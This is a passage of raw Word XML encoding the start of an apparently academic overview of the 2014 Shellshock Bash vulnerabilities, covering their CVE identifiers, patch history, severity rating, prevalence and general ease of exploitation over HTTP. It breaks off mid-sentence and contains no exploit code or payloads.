      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>phane</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Chazelas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, is a family of related security bugs that were found in the widely employed Bash shell in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FA323F" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="00E67088">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> related operating systems. It a</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>most immediately became the headline of most security related media since its public disclosure on Se</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tember 24, 2014</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. The first bug of the family was assigned the CVE identifier CVE-2014-6271</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. Patches aimed to fix this weakness were rapidly developed and sent out. However, the patch was proved to be </w:t>
      </w:r>
      <w:r w:rsidR="00F33D03" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>incomplete</w:t>
      </w:r>
      <w:r w:rsidR="00F33D03" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>3]</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Soon after the first one, 5 additional related flaws were discovered and assigned as CVE-2014-7169</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, CVE-2014-6277</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, CVE-2014-6278</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, CVE-2014-7186</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008D31EF">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>and CVE-2014-7187</w:t>
      </w:r>
      <w:r w:rsidR="00F33D03" w:rsidRPr="00F33D03">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>[8</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.  Emerge</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cy alerts were distributed to related users by major security organizations and products providers such as US-CERT, Red Hat and Apple. US Department of Homeland Security determined Shellshock to be a le</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>el 10 severe vulnerability, which is the highest level on the severity magnitude scale from 1 to 10</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. The rationale behind this extreme rating score is with respect to Shellshock</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s striking features: extremely </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>widespread existence, easiness of exploitation through network, high impact to the entire security triad of confidentiality, integrity and availability after a successful attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>The widespread existence is the primary security concern of Shellshock. Bash is the default shell for most Linux distributions, Unix systems and Apple OS X series</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Today 67.1% of Web servers are powered by Linux and Unix, estimated by </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>W3Techs</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>10]</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, 71% by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Netcraft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>[11]</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> or even up to 82% by Security Space. It is also installed in many jail-broken iOS </w:t>
      </w:r>
      <w:r w:rsidR="00582B99">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>devices</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and some customized Android </w:t>
      </w:r>
      <w:r w:rsidR="00582B99">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>products</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. B</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sides, Win</w:t>
      </w:r>
      <w:r w:rsidR="0028116D">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dows systems with</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> win-bash or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cygwin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> are also with potential</w:t>
      </w:r>
      <w:r w:rsidR="001D4158">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> targets</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be attacked </w:t>
      </w:r>
      <w:r w:rsidRPr="00316A35">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">through </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shellshock.  Moreover, Shellshock exists from almost the beginning of Bash, affecting versions ranging from 1.14 </w:t>
      </w:r>
      <w:r w:rsidR="00CD4F7C">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to 4.3, which means nearly full </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cover</w:t>
      </w:r>
      <w:r w:rsidR="00CD4F7C">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the current Bash containing systems. Even more, almost all embedded </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>equipments</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, such as routers, are running Linux which, if with active Bash, could theoretically be vulnerable to Shellshock attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Another feature of Shellshock that makes it so dangerous is the striking easiness to exploit the vulnerability. An attack could be performed by anyone with modest knowledge of Bash without any sp</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cial tools such as attack kit</w:t>
      </w:r>
      <w:r w:rsidR="00B25E68">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. If the attack is through HTTP request headers, the action will generally not be logged by the system, </w:t>
      </w:r>
      <w:r w:rsidRPr="00316A35">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>thus advanced</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> intrusion detection systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00316A35">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> are required for detection</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Such a</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tack could be launched by manually sending normal HTTP requests with piggy-backed arbitrary code forged by the attacker. As the attack appears as normal Web browsing requests to the system, firewalls are completely translucent to these actual command streams</w:t>
      </w:r>
      <w:r w:rsidR="00AD4D59">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> unless special rules are set up</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="00F50876" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>scarier</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
